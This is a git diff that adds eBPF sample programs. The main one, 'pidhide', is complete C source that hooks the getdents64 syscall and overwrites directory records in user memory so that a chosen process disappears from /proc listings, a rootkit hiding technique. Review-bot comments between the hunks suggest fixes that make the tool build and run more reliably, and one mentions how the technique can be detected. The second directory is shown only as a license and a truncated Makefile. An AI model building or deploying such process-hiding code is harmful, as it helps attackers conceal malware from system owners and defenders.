diff --git a/src/24-hide/.gitignore b/src/24-hide/.gitignore
new file mode 100644
index 0000000..81acd4b
--- /dev/null
+++ b/src/24-hide/.gitignore
@@ -0,0 +1,9 @@
+.vscode
+package.json
+*.o
+*.skel.json
+*.skel.yaml
+package.yaml
+ecli
+bootstrap
+textreplace2
diff --git a/src/24-hide/LICENSE b/src/24-hide/LICENSE
new file mode 100644
index 0000000..47fc3a4
--- /dev/null
+++ b/src/24-hide/LICENSE
@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2020, Andrii Nakryiko
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/src/24-hide/Makefile b/src/24-hide/Makefile
new file mode 100644
index 0000000..ecfd9e1
--- /dev/null
+++ b/src/24-hide/Makefile
@@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. 
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst 
%.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/src/24-hide/common.h b/src/24-hide/common.h new file mode 100644 index 0000000..4686d92 --- /dev/null +++ b/src/24-hide/common.h @@ -0,0 +1,35 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_H +#define BAD_BPF_COMMON_H + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Used when replacing text +#define FILENAME_LEN_MAX 50 +#define TEXT_LEN_MAX 20 + +// Simple message structure to get events from eBPF Programs +// in the kernel to user spcae +#define TASK_COMM_LEN 16 +struct event { + int pid; + char comm[TASK_COMM_LEN]; + bool success; +}; + +struct tr_file { + char filename[FILENAME_LEN_MAX]; + unsigned int filename_len; +}; + +struct tr_text { + char text[TEXT_LEN_MAX]; + unsigned int text_len; +}; + +#endif // BAD_BPF_COMMON_H diff --git a/src/24-hide/common_um.h b/src/24-hide/common_um.h new file mode 100644 index 0000000..06267aa --- /dev/null +++ b/src/24-hide/common_um.h 
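Review bot: `APPS = textreplace2` names an application that does not exist in src/24-hide — the sources added alongside this Makefile are pidhide.c and pidhide.bpf.c — so `make` has no rule that can produce `.output/textreplace2.bpf.o` and the default target fails; it should read `APPS = pidhide`, and the `.gitignore` in the same directory likewise ignores textreplace2 rather than the pidhide binary. The same line is present in src/25-signal/Makefile (same blob ecfd9e1), where it should be `APPS = bpfdos`, with the matching .gitignore fix. The `# minimal minimal_legacy uprobe kprobe ...` tail of that line is commented-out configuration carried over from the template and can be dropped once APPS is corrected.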
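Review bot: `struct event` uses `bool`, but common.h has no `#include` of its own, so it compiles only when the includer has already provided the type (vmlinux.h on the BPF side; presumably stdbool.h via the headers common_um.h pulls in on the user-space side) — a comment stating that contract, or an `#include <stdbool.h>` guarded so the BPF build is unaffected, would make the header self-contained. The comment above `PROG_00` says `login` where `logic` is meant, and the one above `TASK_COMM_LEN` has `user spcae`. The same file is added again as src/25-signal/common.h, so both copies need the change.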
@@ -0,0 +1,96 @@ +// SPDX-License-Identifier: BSD-3-Clause +#ifndef BAD_BPF_COMMON_UM_H +#define BAD_BPF_COMMON_UM_H + +#include +#include +#include +#include +#include +#include +#include + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() { + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool bump_memlock_rlimit(void) +{ + struct rlimit rlim_new = { + .rlim_cur = RLIM_INFINITY, + .rlim_max = RLIM_INFINITY, + }; + + if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) { + fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! 
(hint: run as root)\n"); + return false; + } + return true; +} + + +static bool setup() { + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything + if (!bump_memlock_rlimit()) { + return false; + }; + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) { + return false; + } + + return true; +} + + +#ifdef BAD_BPF_USE_TRACE_PIPE +static void read_trace_pipe(void) { + int trace_fd; + + trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0); + if (trace_fd == -1) { + printf("Error opening trace_pipe: %s\n", strerror(errno)); + return; + } + + while (!exiting) { + static char buf[4096]; + ssize_t sz; + + sz = read(trace_fd, buf, sizeof(buf) -1); + if (sz > 0) { + buf[sz] = '\x00'; + puts(buf); + } + } +} +#endif // BAD_BPF_USE_TRACE_PIPE + +#endif // BAD_BPF_COMMON_UM_H \ No newline at end of file diff --git a/src/24-hide/pidhide.bpf.c b/src/24-hide/pidhide.bpf.c new file mode 100644 index 0000000..f61dfaf --- /dev/null +++ b/src/24-hide/pidhide.bpf.c 
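Review bot: `void sig_int(int signo)` is a non-static function defined in a header, so a program that includes common_um.h from two translation units fails to link with a duplicate symbol; `static void sig_int(int signo)` matches the other helpers in the file. In `read_trace_pipe`, `trace_fd` is never closed once the `while (!exiting)` loop ends — add `close(trace_fd);` after it. The handlers are installed with `signal()` rather than `sigaction()`, so whether a blocking `read()` on trace_pipe is interrupted by SIGINT or transparently restarted depends on the libc's defaults; if the loop is meant to stop on Ctrl-C, state that assumption in a comment or use `sigaction()` without SA_RESTART. The same header is added again as src/25-signal/common_um.h.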
@@ -0,0 +1,210 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to fold the dents buffer addresses +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buffs SEC(".maps"); + +// Map used to enable searching through the +// data in a loop +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, int); +} map_bytes_read SEC(".maps"); + +// Map with address of actual +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_to_patch SEC(".maps"); + +// Map to hold program tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string represenation +// of the PID to hide. 
This becomes the name +// of the folder in /proc/ +const int max_pid_len = 10; +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[max_pid_len]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. 
+ // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[max_pid_len]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 
struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[max_pid_len]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} diff --git a/src/24-hide/pidhide.c b/src/24-hide/pidhide.c new file mode 100644 index 0000000..7f03609 --- /dev/null +++ b/src/24-hide/pidhide.c 
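Review bot: handle_getdents_exit never removes the `map_to_patch` entry on its no-match path — the cleanup at the bottom deletes only map_bytes_read and map_buffs — so the previous-dirent address recorded during one getdents64 call survives into the next; if a later scan then matches on the very first entry of a buffer (before the loop has stored any previous dirent), handle_getdents_patch reads that stale pointer and `bpf_probe_write_user` is aimed into a buffer from an earlier syscall. Add `bpf_map_delete_elem(&map_to_patch, &pid_tgid);` beside the two existing deletes at the end of handle_getdents_exit, and consider skipping the tail call when the match is at `bpos == 0`, since there is no preceding record to fold the entry into. In handle_getdents_enter, `pid`, `fd` and `buff_count` are assigned but never used. A header comment would also help readers who use this sample for detection engineering: the kernel emits a rate-limited warning in the kernel log whenever a program using bpf_probe_write_user is loaded, which is the expected tell for this technique.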
@@ -0,0 +1,178 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include
+#include
+#include
+#include
+#include
+#include "pidhide.skel.h"
+#include "common_um.h"
+#include "common.h"
+
+// Setup Argument stuff
+static struct env {
+ int pid_to_hide;
+ int target_ppid;
+} env;
+
+const char *argp_program_version = "pidhide 1.0";
+const char *argp_program_bug_address = "";
+const char argp_program_doc[] =
+"PID Hider\n"
+"\n"
+"Uses eBPF to hide a process from usermode processes\n"
+"By hooking the getdents64 syscall and unlinking the pid folder\n"
+"\n"
+"USAGE: ./pidhide -p 2222 [-t 1111]\n";
+
+static const struct argp_option opts[] = {
+ { "pid-to-hide", 'p', "PID-TO-HIDE", 0, "Process ID to hide. Defaults to this program" },
+ { "target-ppid", 't', "TARGET-PPID", 0, "Optional Parent PID, will only affect its children." },
+ {},
+};
+static error_t parse_arg(int key, char *arg, struct argp_state *state)
+{
+ switch (key) {
+ case 'p':
+ errno = 0;
+ env.pid_to_hide = strtol(arg, NULL, 10);
+ if (errno || env.pid_to_hide <= 0) {
+ fprintf(stderr, "Invalid pid: %s\n", arg);
+ argp_usage(state);
+ }
+ break;
+ case 't':
+ errno = 0;
+ env.target_ppid = strtol(arg, NULL, 10);
+ if (errno || env.target_ppid <= 0) {
+ fprintf(stderr, "Invalid pid: %s\n", arg);
+ argp_usage(state);
+ }
+ break;
+ case ARGP_KEY_ARG:
+ argp_usage(state);
+ break;
+ default:
+ return ARGP_ERR_UNKNOWN;
+ }
+ return 0;
+}
+static const struct argp argp = {
+ .options = opts,
+ .parser = parse_arg,
+ .doc = argp_program_doc,
+};
+
+
+static int handle_event(void *ctx, void *data, size_t data_sz)
+{
+ const struct event *e = data;
+ if (e->success)
+ printf("Hid PID from program %d (%s)\n", e->pid, e->comm);
+ else
+ printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm);
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ struct ring_buffer *rb = NULL;
+ struct pidhide_bpf *skel;
+ int err;
+
+ // Parse command line arguments
+ err = argp_parse(&argp, argc, argv, 0, NULL,
NULL);
+ if (err) {
+ return err;
+ }
+ if (env.pid_to_hide == 0) {
+ printf("Pid Requried, see %s --help\n", argv[0]);
+ exit(1);
+ }
+
+ // Do common setup
+ if (!setup()) {
+ exit(1);
+ }
+
+ // Open BPF application
+ skel = pidhide_bpf__open();
+ if (!skel) {
+ fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
+ return 1;
+ }
+
+ // Set the Pid to hide, defaulting to our own PID
+ char pid_to_hide[10];
+ if (env.pid_to_hide == 0) {
+ env.pid_to_hide = getpid();
+ }
+ sprintf(pid_to_hide, "%d", env.pid_to_hide);
+ strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide));
+ skel->rodata->pid_to_hide_len = strlen(pid_to_hide)+1;
+ skel->rodata->target_ppid = env.target_ppid;
+
+ // Verify and load program
+ err = pidhide_bpf__load(skel);
+ if (err) {
+ fprintf(stderr, "Failed to load and verify BPF skeleton\n");
+ goto cleanup;
+ }
+
+ // Setup Maps for tail calls
+ int index = PROG_01;
+ int prog_fd = bpf_program__fd(skel->progs.handle_getdents_exit);
+ int ret = bpf_map_update_elem(
+ bpf_map__fd(skel->maps.map_prog_array),
+ &index,
+ &prog_fd,
+ BPF_ANY);
+ if (ret == -1) {
+ printf("Failed to add program to prog array! %s\n", strerror(errno));
+ goto cleanup;
+ }
+ index = PROG_02;
+ prog_fd = bpf_program__fd(skel->progs.handle_getdents_patch);
+ ret = bpf_map_update_elem(
+ bpf_map__fd(skel->maps.map_prog_array),
+ &index,
+ &prog_fd,
+ BPF_ANY);
+ if (ret == -1) {
+ printf("Failed to add program to prog array!
%s\n", strerror(errno));
+ goto cleanup;
+ }
+
+ // Attach tracepoint handler
+ err = pidhide_bpf__attach( skel);
+ if (err) {
+ fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno));
+ goto cleanup;
+ }
+
+ // Set up ring buffer
+ rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL);
+ if (!rb) {
+ err = -1;
+ fprintf(stderr, "Failed to create ring buffer\n");
+ goto cleanup;
+ }
+
+ printf("Successfully started!\n");
+ printf("Hiding PID %d\n", env.pid_to_hide);
+ while (!exiting) {
+ err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+ /* Ctrl-C will cause -EINTR */
+ if (err == -EINTR) {
+ err = 0;
+ break;
+ }
+ if (err < 0) {
+ printf("Error polling perf buffer: %d\n", err);
+ break;
+ }
+ }
+
+cleanup:
+ pidhide_bpf__destroy( skel);
+ return -err;
+}
diff --git a/src/25-signal/.gitignore b/src/25-signal/.gitignore
new file mode 100644
index 0000000..81acd4b
--- /dev/null
+++ b/src/25-signal/.gitignore
@@ -0,0 +1,9 @@
+.vscode
+package.json
+*.o
+*.skel.json
+*.skel.yaml
+package.yaml
+ecli
+bootstrap
+textreplace2
diff --git a/src/25-signal/LICENSE b/src/25-signal/LICENSE
new file mode 100644
index 0000000..47fc3a4
--- /dev/null
+++ b/src/25-signal/LICENSE
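Review bot: `char pid_to_hide[10]` is filled with `sprintf(pid_to_hide, "%d", env.pid_to_hide)`, and parse_arg accepts any positive int, so a ten-digit value such as `-p 1234567890` writes eleven bytes (digits plus NUL) into the ten-byte buffer; use `snprintf(pid_to_hide, sizeof(pid_to_hide), "%d", env.pid_to_hide)` and reject a value whose length plus one exceeds `sizeof(skel->rodata->pid_to_hide)`, since the BPF side copies `pid_to_hide_len` bytes into a stack buffer of that same size. The `if (env.pid_to_hide == 0)` check right after argp_parse exits with `Pid Requried`, which makes the later `env.pid_to_hide = getpid()` default unreachable and contradicts the `Defaults to this program` help text — keep one of the two and fix the typo. `if (ret == -1)` after each `bpf_map_update_elem` is better written `if (ret < 0)`, since libbpf's wrapper returns a negative errno rather than -1 in current releases (confirm against the libbpf vendored in this tree). `Error polling perf buffer` reports on a ring buffer; the same message appears in src/25-signal/bpfdos.c.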
@@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/src/25-signal/Makefile b/src/25-signal/Makefile new file mode 100644 index 0000000..ecfd9e1 --- /dev/null +++ b/src/25-signal/Makefile 
@@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS) + +APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall + +CARGO ?= $(shell which cargo) +ifeq ($(strip $(CARGO)),) +BZS_APPS := +else +BZS_APPS := # profile +APPS += $(BZS_APPS) +# Required by libblazesym +ALL_LDFLAGS += -lrt -ldl -lpthread -lm +endif + +# Get 